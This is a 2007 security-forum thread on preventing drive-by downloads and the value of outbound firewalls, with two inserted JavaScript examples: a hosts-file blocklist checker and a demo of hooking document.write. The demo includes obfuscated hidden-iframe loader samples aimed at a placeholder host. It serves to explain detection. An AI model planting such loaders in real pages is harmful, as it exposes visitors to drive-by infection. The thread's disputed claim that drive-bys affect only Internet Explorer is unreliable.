Why are some not concerned with outbound, especially w/risk driveby downloads?


spamyou
October 5th, 2007, 01:44 PM
My two main questions are:

1) How are you preventing drive-by downloads? Just turn scripting off and suffer the hassles? Or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drive-bys, primarily zero-days that AV misses?)

My reasoning/situation.

I have gotten malware/a virus on my computer once in the past 8 years, my wife ~5 times. All were via infested internet pages. (My wife's AV has probably blocked a hundred over 8 years.)

Not concerned with inbound since I'm using a router, and my software firewall for the past 8 years always says "0 access attempts".

My wife is European, works on websites, and has to use Internet Explorer most of the time. Some European forums/sites occasionally have issues with malware. Turning off scripts makes her work difficult (she refuses to). She has gotten her BIOS and registry hosed a couple of times from zero-day exploits which AV missed. That is a minor irritation. The real concern is she got malware one time which an outbound firewall picked up trying to phone home. While outbound is necessary on her computer, prevention is obviously better.

Greenborder was a godsend sandbox for a few days, until we realized it continuously corrupted IE links, which made it unusable. Sandboxie is not bad, but there are some issues with her work, and it slows down the browser by a second or two, and she thus won't use it.

From our point of view, 100% of the risk is via browsing. Our only real security threat is drive-by downloads, more for my wife than me. Especially to those who don't think outbound is important (i.e. those that are confident they can keep malware off their computer), how do you stop drive-by downloads? Is there something I am missing?

Do you just turn off scripting and suffer with the irritation or?

My wife did try using Firefox with NoScript (even though not convenient for her work), but she got malware using that (it was a site she whitelisted, which later had malware). So back to IE as more convenient for her.

Any other ideas on safe web browsing that I am missing? Greenborder had the right idea, it was just a poor implementation, not to mention they are no longer in business.

WSFuser
October 5th, 2007, 01:54 PM
-{ Quote: "Main two questions is

1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?" }-
I just use NoScript.
-{ Quote: "2) For those not concerned with outbound, why?" }-
So far my AV has caught any malware before it installs. The chance of getting a rootkit or other malware installed and connecting out seems so negligible that I just don't worry about it.

I'm not concerned about legitimate software connecting out either.

ASpace
October 5th, 2007, 02:04 PM
-{ Quote: "
1) How are you preventing drive by downloads?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses).

" }-

Prevention is always better than cure, that is for sure. About drive-by downloads: unlike most of my relatives/friends, I know what a cyber threat is and how it acts, I don't click on each and every link I happen to see, I keep my computer and everything inside "mean and lean" (a.k.a. don't install each and every program). Once malware has infested a machine, it is not difficult to find it and it is not impossible to remove it.


Since I know what is already on the machine, I am supposed to know how and where it connects to, so I trust their connection(s). This is why I don't need outbound firewall protection.


-{ Quote: "From our point of view, 100% of risk is via browsing. Our only real security threat is driveby downloads, more for wife than me. Especially to those who dont think outbound is important, (ie those that are confident they can keep malware off their computer), how do you stop driveby downloads? Is there something I am missing" }-

Think 3 times before you click a link. Choose an antivirus that works (mine has never let me down in critical moments). In addition, make sure your wife's computer has the Microsoft MVP's hosts file (http://www.mvps.org/winhelp2002/hosts.htm) (updated monthly) so that your computer "rejects" known bad sites.
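A hosts-file blocklist like the MVPS one works by pointing listed names at 0.0.0.0, so it only helps when the malicious host is already on the list and the browser looks up exactly that name. The following is an added example, not code from this thread or from the MVPS project, that parses a few constructed lines in the MVPS layout and reports what such a list would and would not stop. The hostnames and URLs are made up for the example (`.test` is a reserved TLD that never resolves).

```javascript
// Added example: parse a hosts-file blocklist (MVPS layout) and check URLs
// against it. The sample entries below are constructed, not from the real list.
const SAMPLE_HOSTS = [
  '# constructed sample in the MVPS hosts layout',
  '127.0.0.1  localhost',
  '0.0.0.0    ads.example-bad.test',
  '0.0.0.0    tracker.example-bad.test   # inline comment',
  '0.0.0.0    www.malware-redirect.test',
  '',
].join('\n');

// Returns the set of hostnames the file sinkholes to 0.0.0.0 / 127.0.0.1.
function parseHostsBlocklist(text) {
  const blocked = new Set();
  for (const raw of text.split('\n')) {
    const line = raw.replace(/#.*$/, '').trim();   // strip comments
    if (!line) continue;
    const [addr, ...names] = line.split(/\s+/);
    if (addr !== '0.0.0.0' && addr !== '127.0.0.1') continue;
    for (const n of names) {
      const name = n.toLowerCase();
      if (name === 'localhost') continue;          // system entry, not a block
      blocked.add(name);
    }
  }
  return blocked;
}

// Says whether a request to `url` would be stopped by the hosts file, and why.
// A hosts file matches whole hostnames only: subdomains of a listed name and
// IP-literal URLs both go straight past it.
function hostsVerdict(url, blocked) {
  let u;
  try { u = new URL(url); } catch (e) { return { blocked: false, reason: 'unparseable URL' }; }
  const host = u.hostname.toLowerCase();
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host) || host.startsWith('[')) {
    return { blocked: false, reason: 'IP-literal host, no name lookup to sinkhole' };
  }
  if (blocked.has(host)) return { blocked: true, reason: 'exact hostname match' };
  const parent = host.split('.').slice(1).join('.');
  if (blocked.has(parent)) {
    return { blocked: false, reason: 'only the parent name is listed; new subdomains are not matched' };
  }
  return { blocked: false, reason: 'not listed' };
}

// Usage: run a few constructed URLs through the constructed list.
const BLOCKLIST = parseHostsBlocklist(SAMPLE_HOSTS);
for (const url of [
  'http://ads.example-bad.test/banner.js',
  'http://cdn.ads.example-bad.test/banner.js',
  'http://203.0.113.7/exp.php',
  'http://clean-site.test/',
]) {
  console.log(url, hostsVerdict(url, BLOCKLIST));
}
```

The exact-match limitation is the practical caveat for the situation described in this thread: a compromised legitimate site, or a freshly registered redirect host, is on nobody's list yet, so a hosts file is a cheap extra filter for known junk rather than a defence against the next drive-by.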

TOMxEU
October 5th, 2007, 02:40 PM
-{ Quote: "1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?" }-
Yeah, that is about all: what I used in XP with a firewall and what I use now along with Vista's engine covered by UAC and IE7 with protected mode.
Disabling scripts provides almost full protection, if you keep your OS and all other apps regularly updated and properly set up, and avoid unknown things.
-{ Quote: "2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses)." }-
I am not concerned about privacy, like some software trying to find out what PC I have or what webpages I visit, as long as it does not slow down the PC.
As HiTech_boy pointed out, prevention is the key, and once the malware is in, it is too late anyway and the best way to get rid of it is a clean install.
I hope that I am quite well protected, because even if I used a dozen security apps, I could still only hope that they would catch all those nasties.
So far I have not noticed any malware on my PC, so I guess that it works (for years), but who knows, maybe I have a bot PC and I don't even know about it.
-{ Quote: "Do you just turn off scripting and suffer with the irritation or?" }-
Well, it has some disadvantages, like a few disabled webpages and some with limited functionality, but its advantages, like speeding up the loading of webpages, no Google ads or popups and a 99% malware-free PC, outweigh them. Anyway, if I want to allow something, I add a webpage to trusted pages and it mostly works; not sure about Firefox, but in IE it is possible to set up which scripts to run along with other settings. I tested it 4 times with zero-day exploits and even when I had POC webpages in the trusted zone, I was protected against 2 of them, until I tried default Internet zone settings; the other 2 could be prevented by hardware DEP.

lucas1985
October 5th, 2007, 03:08 PM
-{ Quote: "Greenborder was a godsend sandbox for a few days, until we realized it continously corrupted IE links, which made it unusable. Sandboxie is not bad, but there are some issues with her work, and it slows down browser by a second or two, and she thus wont use it." }-
Try GeSWall (http://www.gentlesecurity.com/). Very light, policy-based sandbox. The free version protects browsers.
-{ Quote: "My wife did try using firefox with noscript (even though not convient for her work), but she got malware using that, ? it was a site she whitelisted, which later had malware vs other). So back to IE as more convenient for her." }-
Use the temporary whitelist and set NoScript to control plug-ins (QuickTime, Flash). Also keep Firefox up to date.
-{ Quote: "Any other ideas on safe web browsing that I am missing?" }-
Good old common sense, Link Scanner Lite (http://www.explabs.com/products/lslite.asp), etc.

Security is unfortunately almost always a trade-off between convenience and strength.

sukarof
October 5th, 2007, 03:09 PM
-{ Quote: "1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?" }-

As you say, if a whitelisted page gets infected I am not sure NoScript can help. But then I have a second layer of protection: a Limited User Account. On top of that I have a decent antivirus and an application-filtering firewall. If that ever failed me I would use sandboxing software and an unintrusive AT like BOClean, or even likewise unintrusive HIPS like Prevx2 or Norton AntiBot. But so far HIPS in a LUA seems a bit overkill.

-{ Quote: "Any other ideas on safe web browsing that I am missing? Greenborder has right idea, it was just poor implentation, not to mention they are no longer in business." }-

Why not run under a restricted account? It is not that much hassle, one would think. I had until recently avoided LUA because I thought it would hamper my computing, but then I thought if a Linux junkie can live with it, so can I :D

Or you could try surfing inside BufferZone (downside: doesn't work with BHOs like RoboForm), DefenseWall, Sandboxie or SafeSpace, all software that isolates the browser from the rest of the system. RunSafe is another; it lowers the privileges of the browser. So it is not that hard to protect yourself. Personally I haven't seen any malware in years, even when visiting the darker side of the net.

Kees1958
October 5th, 2007, 03:38 PM
-{ Quote: "Main two questions is

1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses).

" }-

On our home PC's we use the combo of a policy sandbox and behavior blocker.

The policy sandbox HIPS should protect from most threats, without sacrificing functionality. For downloaded programs our AV misses, I trust the IDS/behavioral blocker to protect me until the AV knows that malware (when it does something strange the behavior blocker will get it; when it lies low the AV will ultimately know its signs/fingerprint).

DefenseWall or GeSWall (32-bit), HauteSecure (Vista x64), A2 Malware with IDS or ThreatFire free (32-bit) and Primary Response SafeConnect (Vista x64).

You could also run your browser under a limited user account (Amust Defender in XP; Vista has its UAC).



Regards

spamyou
October 5th, 2007, 04:44 PM
Thanks for the suggestions.

I realize that when surfing US/English sites the risk of having financial info stolen via a trojan is negligible, and if it were not for my wife, I would smirk at that possibility as well. But on Russian/Ukrainian sites the new trend is malware that looks for credit card numbers, account numbers etc.

In the US it would be highly unlikely that, say, a moderator at Wilders would post a legitimate link that also silently installs malware; on some Russian sites, not so unlikely. My wife cannot simply avoid any of the sites, and there is no way to tell which rare ones are going to have malware.

Have not tried GeSWall or the Microsoft MVP's hosts file, will look into those, thanks. Though I don't know if MVP will have all the Russian sites.

We both surf with a DropMyRights limited user account, but just started that in the past couple of months, so we will see how that helps.

For her a sandbox would be ideal, as she is basically surfing in a minefield. I will try GeSWall and some of the others listed that I have not tried yet; if I can find something that won't slow her down and allows her to do her work, that would be great.

Thanks again for the suggestions!

Diver
October 5th, 2007, 11:17 PM
If you run Vista with UAC enabled, you are going to get a UAC prompt if a site does anything funny. Don't put too much trust in the IE7 sandbox in Vista. You could give permission to an ActiveX control that was a keylogger. It might only work in IE7, but that is enough to steal your banking logon.

I used NoScript for a while, but found it to be too much work. Even if I am capable of making decisions to train security software, my standard of performance is: could an IT department roll this out to 1000 workstations where 975 of them are run by folks who don't know anything about computers, and would it all work without a jillion calls to the help desk? I really do not need to be bothered by the security software unless something is really amiss. Unfortunately the stuff is so dumb it never gets trained.

There are some highly regarded firewalls and HIPS out there that are actually useless to anyone but an expert user because they are never done asking questions.

Arup
October 5th, 2007, 11:39 PM
With good AVs with proper protection, one only needs to apply some common sense and outbound protection is no longer needed; a router takes care of inbound quite well.

Kees1958
October 6th, 2007, 04:23 AM
-{ Quote: "Thanks for the suggestions.

For her a sandbox would be ideal, as she is basically surfing in a minefield. I will try Geswall and some of the others listed that I have not tried yet, if I can find something that wont slow her down, and allows her to do her work that would be great.

Thanks again for the suggestions!" }-

When you are willing to pay, DefenseWall is the easiest to use. GeSWall free might require some configuration to allow printing from the web.

DefenseWall versus GeSWall = very easy versus easy.
GeSWall Pro versus DefenseWall = in GeSWall you can set certain untrusted apps (like mail = yes, others like P2P and web browser not) to access confidential files (for mail obviously your mailbox directory, but you can deny access to other confidential directories). DefenseWall does not allow untrusted apps to access confidential directories. It is yes or no. The same applies to trust level: DefenseWall only has trusted and untrusted, GeSWall has 4 options. Besides the configurability of untrusted apps per confidential folder, I have not encountered any other advantage GeSWall has over DefenseWall. The advantage DefenseWall has over GeSWall is that it works out of the box, no setup. They both do well in protection (both are of Russian origin, so it takes a hacker to protect you from hackers).

DefenseWall is absolutely the only sandbox HIPS I know which works right out of the box and is a very quiet HIPS. GeSWall is also quiet, but has more options and sometimes (depending on your setup) requires some configuration. That is why my son prefers GeSWall and my wife DefenseWall.

Regards

Kerodo
October 6th, 2007, 09:31 AM
-{ Quote: "With good AVs with proper protection, one only needs to apply some common sense and outbound protection is no longer needed, a router takes care of inbound quite well." }-
Very true Arup, and also, relying on outbound implies that the threat has already installed itself and run on your machine, which is not a good situation either; better to keep the nasty off the PC to begin with.

Cerxes
October 6th, 2007, 09:43 AM
I agree with the above. I've never been concerned about outbound protection since prevention is the most important thing. However, I would like to see some tests/reviews about how good different firewalls are concerning inbound protection. Does anyone know where to find these tests?

/C.

noway
October 6th, 2007, 09:49 AM
Any site can be compromised. If you find out about it, you may be able to use a software firewall to block movement to the (potentially redirected) site that installs the malware:

http://www.wilderssecurity.com/showthread.php?t=136452&highlight=gromozon

Naturally you can also block the usual Microsoft stuff, like when you use Search, Help, the Files and Settings Transfer Wizard, etc., or even block certain sites altogether.

As far as trusting apps goes, you never know when a corporation changes its philosophy or lets bugs creep into its software. Examples like ZoneAlarm connecting to Zone Labs servers without permission (due to a so-called "bug") and some versions of FlashGet being silent while the next version they come out with wants to talk to the whole world. What you trust one day may be the enemy tomorrow, especially if you allow automatic updates, try out new software versions a lot, or don't keep abreast of unpatched vulnerabilities.

Outbound software firewalls provide some protection for the above.

spamyou
October 6th, 2007, 10:57 AM
Kerodo and Arup, the reason I phrased the question like that is that I was hoping those that are not concerned with outbound protection would share what security steps they take that allow them not to be concerned with outbound. Common sense and antivirus programs, be it NOD32, KAV or NAV, are excellent suggestions; unfortunately they are insufficient for surfing Russian web sites, though granted that method works on English/US sites. You could argue that common sense dictates not surfing said Russian web sites, but my wife's job entails doing so. She may be on the same page a hundred times over several months without problem, and then the 101st time it has malware. I used to get irritated at her each time, then I learned what she was up against.

However, I agree 100% that keeping it off is the way to go, and I am trying to get some additional tips for doing so. So far I think a sandbox that does not slow performance would be the best bet.

Kees1958, thanks for the suggestion, I will look at DefenseWall; hopefully they have a trial version so I can see how it performs. Cost is not an issue; I happily paid for Greenborder and used it until realizing it was continuously corrupting IE links/shortcuts, i.e. it kept wiping out the web document tab and thus the URL of the shortcuts. The only issue is whether it will slow down surfing or the computer. My wife has 50-100 pages open at a time, and goes pretty quickly; some sites she visits, some she helps to maintain, some she is a client on, etc. She will use Sandboxie some, but even the slight 1-2 second slowing of surfing over the long run will irritate her to the point she quits using it.

sukarof
October 6th, 2007, 11:19 AM
I must admit that I don't surf to Russian websites that often. It happens, but I guess it is not the malware sites your wife uses. I would love to test my defenses on malware sites (but they are hard to find IMO).
Could you PM me a couple of the sites your wife gets the malware from and I will test the stuff I have to see if I am vulnerable. If I am, I can set up something quickly that will protect me and give you suggestions.

You don't have to worry about spreading malware, I do have layered defense and always have 1- to 6-hour-old images of my system to restore to if something should get out of hand, so I think I can handle any risks. I always image back to a good image after I try malware even if my defenses seem to take care of the attack.

YeOldeStonecat
October 6th, 2007, 12:49 PM
-{ Quote: "
1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses)." }-

I use Firefox or Opera as my primary browser. I only visit a small handful of websites each day... pretty much just the same dozen forums... tech forums, well-known tech forums, sum up to 99% of my browsing. Pretty much the only time I use Internet Exploader is when I hit up my Exchange Server at my office via Outlook Web Access, or use Remote Web Workplace to connect to my Small Business Server clients. No e-mail clients... I use Firefox when I check my Gmail.

Am I sure that I'm immune? No, there's never a guarantee. But I'm careful about what I do; this isn't my first day using a computer. And I'm probably likely to notice odd behavior that may be a symptom of something hitting me.

Software firewalls are no guarantee either... they can have vulnerabilities which can knock them out (stop the service from running).

And... let's face it... I'd wager that at least 95% of software firewall users don't know what the heck most of the warnings are about. svchost or explorer is connecting to the internet... "Oh... OK... go ahead"... /clicks OK.

spamyou
October 6th, 2007, 12:58 PM
-{ Quote: "I must admit that I don't surf to Russian websites that often. It happens, but I guess it is not the malware sites your wife uses. I would love to test my defenses on malware sites (but they are hard to find IMO).
Could you PM me a couple of the sites your wife gets the malware from and I will test the stuff I have to see if I am vulnerable. If I am, I can set up something quickly that will protect me and give you suggestions.

You don't have to worry about spreading malware, I do have layered defense and always have 1- to 6-hour-old images of my system to restore to if something should get out of hand, so I think I can handle any risks. I always image back to a good image after I try malware even if my defenses seem to take care of the attack." }-

Reading my first post, my wife got malware 5 times in 8 years. Surfing ~1000 pages a day, ~300,000 per year, or maybe 1 infection per half million pages. And you want me to send you links so you can surf in the same manner for 3 months till you run into malware?

If there was one site that consistently had malware, no one would go there; it would be out of business. My wife is not surfing porn, where you can find the same malware on the same page ad infinitum.

The whole point: in Russia, legitimate sites rarely get a problem with malware, and recently it is malware targeted towards stealing. It is quickly cleaned off when discovered, but not until some damage is done. It does not really happen much in the US, but monster.com did have some fake ads recently that downloaded trojans that captured personal information and sent it to servers; it was in the news a month or two ago.

If you are really looking for malware, I am sure plenty of people could tell you where to find it even in the US.

Ilya Rabinovich
October 6th, 2007, 02:24 PM
-{ Quote: "I must admint that I dont surf to russian websites that often." }-
Most of the sites that spread malware are not in the .ru zone; most of them are .biz, .info and .com.

Mrkvonic
October 6th, 2007, 02:42 PM
Hello,

Without quoting you too much ...

1. Drivebys only work in IE, never in Firefox or Opera, so use those.

2. As to getting infected using Firefox with NoScript: it's not difficult. You reach a site, you download a file, you execute it; you are infected. As to getting infected by simply visiting a page, with the above setup: no chance.

3. Outbound - don't get infected and your outbound is a perk ... simple as that.

Mrk

Ilya Rabinovich
October 6th, 2007, 03:03 PM
-{ Quote: "1. Drivebys only work in IE, never in Firefox or Opera, so use those." }-
Drive-by-download malware spreads with all the browsers you just mentioned. Just look for an interview with the MPack developer; he recommended Opera with JavaScript disabled. :D

Mrkvonic
October 6th, 2007, 03:10 PM
Hello,
Recommendations are one thing. Theory is another.
Reality is something else.
Mrk

Bubba
October 6th, 2007, 03:13 PM
-{ Quote: "Hello,
Recommendations are one thing. Theory is another.
Reality is something else.
Mrk" }- and misinformation spread is the worst of all evils.

Mrkvonic
October 6th, 2007, 05:44 PM
Hello,

I have posted in good faith, fully believing what I wrote and without any intention to deceive or mislead anyone.

The way I see things, and here's an analogy: a person could get killed by a meteor or he might tunnel through a wall; nothing in the physical laws prevents this from happening. It's just that the chances are so small we can round them to zero.

The same applies here. Of course, the utterly careless combination of downloading and executing files without regard while searching for cracks and such, plus the use of outdated software (not a week or two but months), might possibly result in some sort of remote execution exploit. But I think this is a remote chance by far.

Cheers,
Mrk

spamyou
October 6th, 2007, 06:04 PM
-{ Quote: "Hello,

I have posted in good faith, fully believing what I wrote and without any intention to deceive or mislead anyone.

The way I see things, and here's an analogy: a person could get killed by a meteor or he might tunnel through a wall; nothing in the physical laws prevents this from happening. It's just that the chances are so small we can round them to zero.

The same applies here. Of course, the utterly careless combination of downloading and executing files without regard while searching for cracks and such, plus the use of outdated software (not a week or two but months), might possibly result in some sort of remote execution exploit. But I think this is a remote chance by far.

Cheers,
Mrk" }-

Well, my wife has gotten hit 5 times in 8 years; not common, but too common for me.

Once was using Firefox with NoScript. She whitelisted quite a few sites; it is simply impractical otherwise, unless you want to hit OK 10 times each time you land on a site. And she has to allow scripts on some sites. And likely, and unfortunately, one site she whitelisted later had a malicious script.

Bottom line: she has an entirely different use than you, an entirely different set of needs, entirely different sites, an entirely different risk than you. So unfortunately your way does not work for everyone's needs. It works for me and you, but not for her.

But I guess if you don't see it in your habits, it does not exist.

Pedro
October 6th, 2007, 06:26 PM
IMO, reading your concerns and the replies, look into GeSWall and DefenseWall as recommended, and choose one.
Then perhaps LinkScanner Pro (given the requirements from your wife's browsing) already suggested too.
Anti-virus: the paid ones that are regarded as the best, Avira AntiVir, NOD32 or Kaspersky.

That's just software recommendations though. DEP configured to AlwaysOn, if it doesn't break anything important, is a good start. This thread (http://www.wilderssecurity.com/showthread.php?t=175384&page=2&highlight=alwayson) was where I learned about it, from Ilya. Read from that page onwards and you'll see what's at stake.

Then the limited user account. If something doesn't work in LUA, try reading here (http://www.wilderssecurity.com/showthread.php?t=181375&highlight=sudo).

lucas1985
October 6th, 2007, 06:53 PM
Another solution might be "shadow" software (Deep Freeze, Shadow Defender, Returnil, PowerShadow). They clean everything on reboot. Of course, they don't prevent data stealing between reboots, and you need to save any document/file stored on the system partition before rebooting.

herbalist
October 6th, 2007, 11:01 PM
-{ Quote: "relying on outbound implies that the threat has already installed itself and run on your machine...." }-
Not necessarily. Using a software firewall to block/alert on new or unexpected outbound connections is acknowledging the possibility that your primary defenses aren't foolproof, especially the user. No anti-whatever catches everything. No user's judgement is perfect. Common sense doesn't always get it done, not when trusted sites can be compromised. The software firewall is another layer of defense that just might keep your data out of the wrong hands should your primary defenses (or the user) fail.
-{ Quote: "Recommendations are one thing. Theory is another.
Reality is something else." }-
Today's theories and POCs are tomorrow's exploits. The alternate browsers may have fewer vulnerabilities, which get fixed much quicker, but the fact that they do get patched or updated demonstrates that they can be exploited. Firefox and Opera may be safer to use than IE, but no browser is invulnerable.
Rick

drkoopz
October 6th, 2007, 11:23 PM
Personally I prefer the type of outbound firewall that has a large whitelist of applications and only asks the questions that are needed. When HIPS comes into the situation (Comodo beta) I usually just turn it off. Too much noise really.

So yes, I think a software firewall with outbound is necessary if your defenses are taking a nap. However, I agree with the notion that it can't hog system resources and it can't bug you to death.

I've always been under the impression that firewall developers drive themselves crazy balancing security with convenience. :P

FadeAway
October 7th, 2007, 12:05 AM
-{ Quote: "
2) For those not concerned with outbound, why? " }-

As more and more leak tests were developed they showed that outbound control by a firewall was, at best, well, leaky. From my point of view, it's wiser to seek another defense than rely on a gun that is half loaded with blanks. I think HIPS, IDS, whitelists, rollback software, etc., are a better way to go. Needless to say, I gave up on bi-directional firewalls in favor of inbound-only filtering. Better the devil you know....

Kerodo
October 7th, 2007, 01:39 AM
Well, I have been surfing the net for about 12 years now, going to good and bad places alike, using Firefox, Opera, K-Meleon in recent times, along with IE7 and prior versions, and I have never ever once been hit by a drive-by download, so I must just be lucky....;)

tlu
October 8th, 2007, 08:31 AM
-{ Quote: "Well, I have been surfing the net for about 12 years now, going to good and bad places alike, using Firefox, Opera, K-Meleon in recent times, along with IE7 and prior versions, and I have never ever once been hit by a drive-by download, so I must just be lucky....;)" }-

Ah, but perhaps you are part of a botnet, and you're just not aware of it... ;)

Seriously: what you said is also true for me. The only difference is that I've been using Firefox exclusively for many years. (In the ol' days when I still used IE, browsing wasn't as dangerous yet.)

Just my two cents: I agree with Mrk that browsing with Firefox is very safe and even safer with NoScript (although it's true that whitelisted sites can also be compromised); all things considered, the probability of becoming infected is very small when using this browser. I also agree with sukarof that a limited account enhances security considerably. And I also use a HIPS, but actually I don't need it.

As for outbound control: my opinion about this topic can be read in this (http://www.wilderssecurity.com/showpost.php?p=1077924&postcount=22) posting.

Kerodo
October 8th, 2007, 03:53 PM
-{ Quote: "Ah - but perhaps you are a part of a botnet, and you're only not aware of it ...;)

" }-
Yes, and perhaps this is the planet Zaphrod that I'm living on too... ;)

Zombini
October 16th, 2007, 01:55 AM
-{ Quote: "Main two questions is

1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses).

My reasoning/situation.

I have gotten malware/virus on my computer once in past 8 years, my wife ~5 times. All were via internet infested pages. (My wifes AV has probably blocked a hundred over 8 years)

Not concerned with inbound since using router, and my software firewall past 8 years always says "0 access attempts".

My wife is european, works on websights, and has to use internet explorer most of the time. Some of European forums/sites occasionally have issues with malware. Turning off scripts makes her work difficult (she refuses to). She has gotten her bios and registry hosed a couple times from zero day exploits which AV missed. That is a minor irritation. The real concern is she got malware one time which an outbound picked up trying to phone home. While outbound is necessary on her computer, prevention is obviously better.

Greenborder was a godsend sandbox for a few days, until we realized it continously corrupted IE links, which made it unusable. Sandboxie is not bad, but there are some issues with her work, and it slows down browser by a second or two, and she thus wont use it.

From our point of view, 100% of risk is via browsing. Our only real security threat is driveby downloads, more for wife than me. Especially to those who dont think outbound is important, (ie those that are confident they can keep malware off their computer), how do you stop driveby downloads? Is there something I am missing?

Do you just turn off scripting and suffer with the irritation or?

My wife did try using firefox with noscript (even though not convient for her work), but she got malware using that, ? it was a site she whitelisted, which later had malware vs other). So back to IE as more convenient for her.

Any other ideas on safe web browsing that I am missing? GreenBorder had the right idea, it was just a poor implementation, not to mention they are no longer in business." }-

The best protection on the market for drive-by downloads is Browser Defender in NIS2008. Here is why: NIS2008 is able to see through any kind of encryption or obfuscation used by drive-by downloads. Kaspersky and some others can only see whatever a document.write sees, since that's what they hook. So they miss a lot of stuff. Some numbers on some other newsgroups indicate that KIS missed 1217 out of 13000 websites tested. That's a lot. And I believe it, because I have seen it miss a few and the system gets infected.

One misconception is that if Windows Update runs and Windows is patched then you are protected. That is far from the truth. The reality is that the newer vulnerabilities are in 3rd-party ActiveX like Yahoo WebCam, Yahoo Widgets, WinZip, NCTAudio, Baidu Soba Search bar, WebThunder etc. These take time to patch and during that time you are exposed.

So here is what I would recommend:
- Keep your system fully patched INCLUDING 3rd party software
- Run a sophisticated browser exploit detection software like NIS2008 (07 and below don't have this)
- Run a sandboxing tool like Haute Secure (just as a safety measure).
- Finally, always terminate ALL instances of the browser and then launch a fresh one before doing ANY online financial transaction where a lot is at stake. The reason for this is simple. All of this sandboxing software has many fundamental flaws, the most important of which is that the exploit occurs and malicious code is running in the browser process (it can't get out). But if you use that same process to visit Bank of America, you could get your creds stolen.

BTW, if you find a URL that NIS2008 does not block, let me know.

Hope that helps.
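The post above contrasts products that hook document.write with ones that look through obfuscation. The following is an added example, not code from the thread, from Symantec or from any of the products named: it builds a minimal document.write hook of the kind described, runs it against two constructed samples that plant the same hidden iframe loader (one through string-obfuscated document.write, one through DOM APIs), and then adds a post-execution DOM sweep. The fake `document`, the `looksLikeHiddenLoader` heuristic and the `example.invalid` URL are all assumptions made for the demo.

```javascript
'use strict';

// Constructed stand-in for the parts of the DOM the two samples touch (not a real browser).
function makeFakeDocument() {
  const doc = {
    written: [],   // everything that passed through document.write
    children: [],  // elements appended through DOM APIs
    write(html) { doc.written.push(html); },
    createElement(tag) {
      return { tagName: tag.toUpperCase(), attrs: {}, setAttribute(k, v) { this.attrs[k] = v; } };
    },
    body: { appendChild(el) { doc.children.push(el); } },
  };
  return doc;
}

// Demo heuristic (assumption): a loader is an iframe/script with a src that is sized or styled
// so the user cannot see it. Real products use far richer rules; the shape is what matters here.
const HIDDEN_RE = /\b(width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden/i;
function looksLikeHiddenLoader(html) {
  return /<(iframe|script)\b[^>]*\bsrc\s*=/i.test(html) && HIDDEN_RE.test(html);
}

// The hook: wrap document.write so each string is inspected AFTER the page's own script has
// decoded it. That is why string-level obfuscation does not defeat a write hook.
function installWriteHook(doc, alerts) {
  const original = doc.write;
  doc.write = function (html) {
    if (looksLikeHiddenLoader(String(html))) alerts.push({ via: 'document.write', html: String(html) });
    return original.call(doc, html);
  };
}

// The gap: a loader built with createElement/appendChild never goes through document.write.
// Sweeping what actually landed in the DOM catches it regardless of the API used.
function sweepDom(doc, alerts) {
  for (const el of doc.children) {
    const attrs = Object.entries(el.attrs).map(([k, v]) => `${k}="${v}"`).join(' ');
    const asHtml = `<${el.tagName.toLowerCase()} ${attrs}>`;
    if (looksLikeHiddenLoader(asHtml)) alerts.push({ via: 'dom-sweep', html: asHtml });
  }
}

// Run a sample as if it were an inline <script> with `document` in scope.
function runPageScript(source, doc) {
  new Function('document', source)(doc);
}

// Constructed samples. example.invalid is a reserved name and resolves to nothing.
const LOADER = '<iframe src="http://example.invalid/loader" width=0 height=0></iframe>';
const CODES = JSON.stringify([...LOADER].map((c) => c.charCodeAt(0)));
// Sample A: the markup exists only as a char-code array until the page decodes it and calls document.write.
const SAMPLE_WRITE = `var c=${CODES};document.write(String.fromCharCode.apply(null,c));`;
// Sample B: the same loader assembled through DOM calls; document.write is never invoked.
const SAMPLE_DOM =
  "var f=document.createElement('iframe');" +
  "f.setAttribute('src','http://example.invalid/loader');" +
  "f.setAttribute('width','0');f.setAttribute('height','0');" +
  'document.body.appendChild(f);';

// Returns the alerts raised for one sample, with or without the DOM sweep.
function analyse(source, { sweep }) {
  const doc = makeFakeDocument();
  const alerts = [];
  installWriteHook(doc, alerts);
  runPageScript(source, doc);
  if (sweep) sweepDom(doc, alerts);
  return alerts;
}

console.log('write hook only, obfuscated document.write:', analyse(SAMPLE_WRITE, { sweep: false }).length, 'alert(s)');
console.log('write hook only, DOM-built loader:         ', analyse(SAMPLE_DOM, { sweep: false }).length, 'alert(s)');
console.log('write hook + DOM sweep, DOM-built loader:  ', analyse(SAMPLE_DOM, { sweep: true }).length, 'alert(s)');
```

Run it with `node` and the three lines print 1, 0 and 1. The first result is the point the post makes in the vendor's favour: the hook sees the decoded markup, so char-code or escape-style obfuscation of the string itself buys the attacker nothing. The second result is the limitation the post attributes to write-hooking products: anything inserted through other DOM APIs is invisible to the hook. The third shows the cheapest complement, inspecting the resulting document rather than one entry point.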

Diver
October 16th, 2007, 09:24 AM
This is an interesting discussion. I looked up a few of the HIPS products mentioned above. Their descriptions seem to be a lot like running in a limited user account.

You might want to try this resource for using an LUA:

http://nonadmin.editme.com/

His "easy" method is to use an administrative account with a blank password and fast user switching. One of the benefits of the LUA is that things are blocked and there is no prompt to react to, thus eliminating the possibility of making a bad choice. It is not possible to install an ActiveX control in IE while running LUA.

I am of the persuasion that outbound protection is overblown. Its popularity comes from the fact that it is easy to run these tests and rank firewalls accordingly.

There seems to be a general lack of evidence that outbound filtering is catching malware. Perhaps this is because the malware uses techniques to make outbound communication that are different from the leak tests such as disabling the firewall or bypassing it with a communications driver.

